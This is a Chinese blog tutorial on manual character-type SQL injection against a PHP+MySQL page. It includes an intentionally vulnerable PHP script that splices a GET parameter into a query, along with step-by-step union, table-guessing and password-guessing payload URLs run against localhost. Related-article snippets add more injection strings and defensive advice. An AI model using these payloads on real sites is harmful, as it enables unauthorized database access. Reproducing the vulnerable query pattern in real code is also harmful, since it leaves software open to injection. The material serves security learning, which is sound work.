mysql手动注入_SQL注入系列之PHP+Mysql手动注入(一)----字符型

最新推荐文章于 2024-04-03 18:00:00 发布
最新推荐文章于 2024-04-03 18:00:00 发布
阅读量244 收藏
点赞数
文章标签: mysql手动注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34650199/article/details/113208751
版权

一、什么是字符型注入以及原理

1)字符型注入简介

字符串或串(String)是由数字、字母、下划线组成的一串字符。一般记为 s=“a1 a2 ···an ” (n>=0)。它是编程语言中表示文本的数据类型。

字符型注入就是把输入的参数当做字符串来对数据库进行查询,字符型注入在sql语句中都采用单引号括起来。

2)基本原理:

看看这条SQL语句

$query="select first_name from users where id='$_GET['id']'";

这句SQL的语句就是基于用户输入的id在users表中找到相应的first_name,正常用户当然会输入例如1,2等等。但是如果有人输入这样的内容呢?

1' union select database() #;

这样的话这句SQL语句就变成了这样

select first_name from users where id='1'unionselect database()#'

这样的话,我们不仅可以得到id=1的first_name,还可以得到当前数据库的相关信息,这是开发人员所没有想到的。以上只是一个简单的SQL注入的例子。

从根本上讲,当开发人员对用户的输入过滤不严,造成了用户可以通过输入SQL语句控制数据库,就会产生SQL注入漏洞。

简而言之,基于字符型的SQL注入即存在SQL注入漏洞的URL参数为字符串类型(需要使用单引号表示)。

字符型SQL注入的关键—–单引号的闭合

MySQL数据库对于单引号的规则如下:

单引号必须成对出现,否则数据库就会报错。

如果两个单引号之间内容为空,数据库自动忽略。

应用程序数据库的字符型SQL语句为:

select * from tables where idproduct=’13’;

select * from tables where name=’fendo’;

select * from tables where data=’01/01/2017’;

二、字符型注入与数字型注入的区别

字符:除数字之外都是字符

数字:0-9

两种SQL语句的区别:

数字型: SELECT 列 FROM 表 WHERE 数字型列=值

字符型: SELECT 列 FROM 表 WHERE 字符型列=’值’

三、如何判断是否是字符型注入

测试注入语句是:

xx' and '1'=1--'

xx' and '1=2--'

如果第一个页面正常,而使用第二个的时候页面出现错误则,该url可以进行字符型注入

c4dc0c1ed0822d776168e226a6a77a1f.png

8e6ba97592e47569940e59ea20ab1c89.png

四、字符型注实战

测试源码:

$name=$_GET['username'];

$conn=mysql_connect("127.0.0.1","root","123");//连接mysql数据库

if($conn){

echo "连接数据库成功!";

}//判断连接是否成功

echo "
";

mysql_select_db('fendo',$conn);//选择连接请求为conn的数据库(fendo)

$sql="select * from user where username = '$name'"; //字符型搜索语句

$result=mysql_query($sql);

while($row=mysql_fetch_array($result)){

echo "用户ID:".$row['id']."
";

echo "用户名:".$row['username']."
";

echo "用户密码:".$row['password']."
";

echo "用户邮箱:".$row['email']."
";

}

mysql_close($conn); //关闭数据库连接

echo "

";

echo "你当前执行的sql语句为:"."
";

echo $sql;

?>

表数据:

a3e814f7dbea472c5355fe0b3d61df8c.png

当我们访问:http://localhost/sqltest/char.php?username=admin 时

执行的代码是:

$sql="select * from user where username = '$name'";

解析成SQL就是 select  * from user where username = 'admin' 执行结果为

7d2dd241046a80abf16f647f9361f098.png

进行SQL注入:

1.猜字段数

使用union select 1,2,3,4.... 去猜。这里为4是正确说明字段数为4。

http://localhost/sqltest/char.php?username=admin' union select1,2,3,4 and '1'='1

80e5a8b286b61e2a944ea91a9c5a6cca.png

爆出1,2,3 更换SQL语句得出当前的数据库名字与数据库版本

http://localhost/sqltest/char.php?username=admin' union select database(),version(),3,4 and '1'='1

5a016c1f6409e5b0d2148c3469ba354d.png

2.猜表名

获取表名使用 '+and+(select+count(*)+from+表名)>0+and+''=' 这种格式。

http://localhost/sqltest/char.php?username=admin'+and+(select+count(*)+from+user)>0+and+''='

3ad1f28914064b75da8623e92aa0078b.png

没报错说明存在user这个表。

3.猜密码

http://localhost/sqltest/char.php?username=admin' and password='fendo

d9da784c1e4c68880456eae19631e4e9.png

徐令予
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
select * from where 三个条件_数据库——SELECT 查询
weixin_32275943的博客
01-25 3万+
语法1:SELECT * FROM 表名 * 号表示:查询这个表的所有信息,在开发中能不用*号尽量不要用 * 号 例子:查询student 表中的所有记录信息​*****************************************************************************************语法2:SELECT 字段1,字段2,字段3..... FRO...
python-mysql day02.txt
04-27
Day01回顾 1、MySQL特点 1、关系数据库 2、跨平台 3、支持多种编程语言 2、启动连接 sudo /etc/init.d/mysql start|stop|restart|status mysql -hIP地址 -u用户名 -p密码 MySQL中数据是以文件形式存放在数据库目录/var/lib/mysql 关系数据库的核心内容是 关系 即 二维表 3、基本SQL命令 1、库管理 1、show databases; 2、create database 库名 character set latin1; 3、select database(); 4、use 库名; 5、show tables; 6、drop database 库名; 2、表管理 1、create table 表名(字段名 数据类,...) char...; 2、show create table 表名; (字符集、存储引擎) 3、desc 表名; 4、drop table 表1,表2,表3;
MySQL中浮点字符可能会遇的问题详解
12-16
前言 本文主要给大家介绍了MySQL中在将浮点字符的时候遇到的一个问题,分享出来供大家参考学习,下面话不多说了,来一起看看详细的介绍吧。 一 问题描述 今天遇到一个刷数据的需求,是修改产品的重量(字段类为float),修改了产品的重量之后,是需要记录到日志表中的(字段类为varchar),表结构如下: 临时刷数据表: CREATE TABLE `temp_170830` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '主键ID', `goods_sn` varchar(255) NOT NULL DEFAULT
字符注入,报错注入
Dug123456_的博客
04-03 1585
输入不同种的语句 显示的不同 存在sql漏洞输入1发现id=‘1’,所以为字符注入
超级sql注入工具
11-02
超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类的SQL注入,支持HTTPS模式注入。 超级SQL注入工具目前支持Bool盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库
mysql_fetch指针复位,多次执行mysql_fetch_array()的指针归位问题探讨
weixin_39633500的博客
03-23 322
多次执行mysql_fetch_array()的指针归位问题探讨有时候在读取数据库之后,针对同一结果集,在同一个页面上输出的时候可能会碰到多次输出,也就是多次执行mysql_fetch_array(),在第二次执行的时候,如果不加处理,就不会输出任何内容,这种情况下只需要对循环指针进行复位即可。第一次执行:复制代码 代码如下:while($row=mysql_fetch_array($result...
sql注入学习笔记
qq_44897253的博客
12-02 3563
文章目录什么是sql注入sql注入的原理sql注入方法1.1数字注入1.2字符注入sql注入常见的绕过方式sqlmap的简单使用sql注入的危害sql注入的防范措施 什么是sql注入 sql注入是指web应用程序对用户输入的数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的sql语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 sql注入的原理 sql注入攻击是通过操作输入来修改
SQL注入系列之PHP+Mysql手动注入(二)----字符
fendo
02-25 7044
一、什么是字符注入以及原理 1)字符注入简介 字符串或串(String)是由数字、字母、下划线组成的一串字符。一般记为 s=“a1 a2 ···an ” (n>=0)。它是编程语言中表示文本的数据类字符注入就是把输入的参数当做字符串来对数据库进行查询,字符注入在sql语句中都采用单引号括起来。 2)基本原理: 看看这条SQL语
漏洞篇(SQL注入一)
m0_58001548的博客
03-26 1028
此时我们输入的第一个单引号将 username 的单引号闭合,相当于输入了一个空用户,or 表示左右两边只要有一边条件判断成立则该语句返回结果为真,其中 1=1 永远为真,所以当前 SQL 语句无论怎么执行结果永远为真,--空格表示注释,注释后面所有代码不再执行。我们可以看到上面我们闭合的方法是没有输入用户名的,所以并不能成功登陆。
SQL注入教程
weixin_51047454的博客
03-17 1万+
sql注入教程
SQL注入原理-字符注入
T1ngSh0w的博客
09-13 8342
SQL注入原理-字符注入
PHP+MYSQL 注入靶场
最新发布
04-26
里面有相关源码,参照源码去理解漏洞会更深刻,靶场中有SQL字符注入,SQL盲注,提供给大家进行练习使用。
PHP MYSQL注入攻击需要预防7个要点
12-15
2:字符参数使用类似mysql_real_escape_string这样的方法强制过滤,而不是简单的addslashes。 3:最好抛弃mysql_query这样的拼接SQL查询方式,尽可能使用PDO的prepare绑定方式。 4:使用rewrite技术隐藏真实...
[理论-学习]Web安全-SQL注入-基础01
3hex的博客
08-15 202
一、SQL的介绍 1. SQL(Structured Query Language)即结构化查询语言。最早使用在System R中,后来逐渐推广为一个规范。 2. SQL的分类: DQL(Query):Select DML(Manual):Insert,Update,Delete DDL(Define):Create,Drop,Alert DCL(Control):rant,Revoke,Commit 二、SQL注入基础 1...
SQL常用命令
热门推荐
hellocsz的博客
07-22 1万+
  下面是一些常用的SQL语句,虽然很基础,可是却很值得收藏,对于初学者非常实用 SQL常用命令使用方法: (1) 数据记录筛选: sql="select * from 数据表 where 字段名=字段值 order by 字段名 [desc]" sql="select * from 数据表 where 字段名 like '%字段值%' order by 字段名 [desc]" sql="se...
SQL基础
分享不仅为了他人,同时也为了自己
11-16 3893
Select User表里面的数据如下 查询user表里面的user_name字段和user_age字段的所有数据 Select user_name,user_age from user 查询user表中所有的字段数据,用 * 表示列的名称 Select * from user 四、Distinct Distinct选取所有的值的时候不会出现重复的数据 用普通的查询,查询所有 Select * from user Select distinct u...
Web安全--SQL注入
bobo_milk的博客
11-10 535
floor():id=1' and (select 1 from (select count(*),concat(操作代码,floor(rand(0)*2))x from information_schema.tables group by x)a) --+extractvalue():id=1' union select 1,(extractvalue(1,concat(0x7e,(select 操作代码)))) --+最快的办法就是使用工具跑,可以使用bp的intruder进行爆破字符
sql注入数字字符的原理 //(dvwa实战 sql injection low)
weixin_43749051的博客
03-04 1707
1、数字注入 当输入的参数为整形时,如果存在注入漏洞,可以认为是数字注入。 测试步骤: (1) 加单引号,URL:www.text.com/text.php?id=3’ 对应的sql:select * from table where id=3’ 这时sql语句出错,不符合sql语法,让数据库系统报错,如果没报错就说明 ‘ 被过滤了,这样不存在注入的可能。 (2) 加and 1=1 ,URL:www.text.com/text.php?id=3 and 1=1 对应的sql:select *
sql注入语句万能密码_sql注入——万能密码
weixin_40001025的博客
12-06 5857
通过两个ctf题来做讲解,第一个很简单,第二个多了些限制http://lab1.xseclab.com/sqli2_3265b4852c13383560327d1c31550b60/index.phphttp://ctf5.shiyanbar.com/web/wonderkun/web/index.html 万能密码原理万能密码漏洞都是因为提交字符未加过滤或过滤不严而导致的。$sql =...
sql手工注入漏洞测试(mysql数据库-字符)
06-28
### 回答1: SQL手工注入漏洞测试通常是通过构造恶意输入来测试数据库系统的安全性,以检测可能存在的漏洞。在针对MySQL数据库的字符注入测试中,攻击者会尝试利用输入表单中的字符数据来破坏SQL语句的可靠性,进而获取对数据库的访问权限。 攻击者通常会使用一些SQL注入工具,例如SQLMap、Havij等,通过模拟输入表单来测试Web应用程序是否存在SQL注入漏洞。在手动测试的过程中,攻击者需要了解目标系统中数据库的结构和使用的语言,并通过逐步构造恶意输入数据来尝试绕过系统的安全验证和防火墙,以获取对数据库的访问权限。 为避免SQL注入漏洞的产生,建议采用安全性更高的编程语言和框架,例如使用预处理语句、输入验证和过滤技术,同时定期对Web应用程序进行漏洞扫描和安全性检测,以降低数据库被攻击的风险。 ### 回答2: SQL注入是一种利用网站未正确过滤或验证用户输入数据的漏洞,通过构造一些特殊的SQL查询语句,来实现绕过网站的权限控制或者直接在数据库上执行一些恶意操作的攻击技术。SQL注入漏洞是常见的Web安全问题之一,并且MySQL是被广泛使用的数据库之一,因此测试MySQL数据库的手工注入漏洞测试也是非常必要的。 手工注入漏洞测试有多种方法,最常见的是利用逻辑性错误和SQL语句字符转义的脆弱性来构造恶意的SQL查询语句。首先,我们可以查找网站的URL参数和表单输入框,尝试在这些输入框中输入一些特殊字符(例如单引号,双引号和分号),看看是否能够返回一些不同寻常的错误信息。如果页面返回了一些SQL错误信息,那么很有可能存在SQL注入漏洞。 接下来的一步是手动构造SQL查询语句,注入恶意的代码。一般来说,SQL注入漏洞的主要攻击方法是利用SELECT,UPDATE,DELETE和INSERT等操作语句。我们可以在URL参数或表单输入框中输入如下代码片段,来测试是否存在漏洞: 1. SELECT * FROM users WHERE username='admin' AND password='' OR '1'='1'; 2. SELECT * FROM users WHERE username='admin' AND password='' UNION ALL SELECT 1,2,3; 3. SELECT * FROM users WHERE username='admin' OR 1=1# AND password=''; 上述代码分别用于测试逻辑性错误漏洞、UNION注入和基于SQL注释的漏洞。如果我们能够成功执行这些恶意代码,那么就说明存在SQL注入漏洞,攻击者可以使用类似的代码片段来执行任意的SQL查询。 为了防止SQL注入漏洞,可以采取以下措施: 1. 输入过滤:检查输入数据是否包含恶意代码和SQL语句特殊字符,并过滤或转义掉这些字符。 2. 预编译语句:使用PreparedStatement或其他预编译语句可以避免SQL语句被拼凑,从而避免SQL注入漏洞。 3. 限制查询权限:限制数据库用户的查询权限,并使用最小特权原则。 总之,在进行MySQL数据库的手工注入漏洞测试时,需要充分理解SQL注入漏洞的原理和漏洞类,并采取适当的防护措施来保护Web应用程序的安全性。 ### 回答3: SQL注入漏洞是常见的网络安全漏洞之一,而SQL手工注入漏洞测试是一种检测和验证SQL注入漏洞的方法。在Mysql数据库字符注入漏洞测试中,我们需要先准备好一台虚拟机或者真实主机,然后搭建好LAMP或者LEMP环境,以便进行后续的测试。 1. 测试目标 首先确定我们要测试的目标,这可以是一个网站,或者是一个具有数据库功能的应用程序。我们需要了解和分析目标,找到目标系统的漏洞点,才能有针对性地进行注入漏洞测试。 2. 确认注入点 找到目标系统的漏洞点后,我们需要确认注入点,这就是通过输入特定的字符序列来判断系统是否存在SQL注入漏洞。在Mysql数据库字符注入漏洞测试中,我们可以使用’和”这两个字符进行测试来确定注入点。 例如:我们可以输入以下字符序列来测试系统是否存在SQL注入漏洞:“'or 1=1#”,如果直接返回了数据,则说明该系统存在SQL注入漏洞。 3. 确认数据库类和版本 在进行注入漏洞测试之前,我们需要知道目标系统所使用的数据库类和版本。在Mysql数据库字符注入漏洞测试中,我们可以通过以下语句来确定数据库版本: select version(); 4. 利用SQL语句注入漏洞 当我们成功确认时,就可以利用SQL语句进行注入漏洞测试了,具体的方法如下: a. 使用union查询合并数据:可以输入以下字符序列来进行测试:‘+union+select+1,2,3#',如果成功,则系统会返回一个由“1,2,3”组成的数据集。 b. 使用group by控制查询结果:可以输入以下字符序列来进行测试:‘+union+select+1,count(*)+from+table_name+group+by+1#',如果成功,则系统会返回各个数据组的数量。 c. 使用order by控制查询结果排序:可以输入以下字符序列来进行测试:‘+union+select+1,2+from+table_name+order+by+3#',如果成功,则系统会返回具有排序的数据集。 5. 总结 以上就是Mysql数据库字符注入漏洞测试的基本步骤和方法。当然,注入漏洞测试是一项繁琐的工作,需要有一定的技术水平和丰富的经验。在进行注入漏洞测试之前,一定要保证进行充分的备份和风险评估,以防止对目标系统造成不可逆转的损失。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值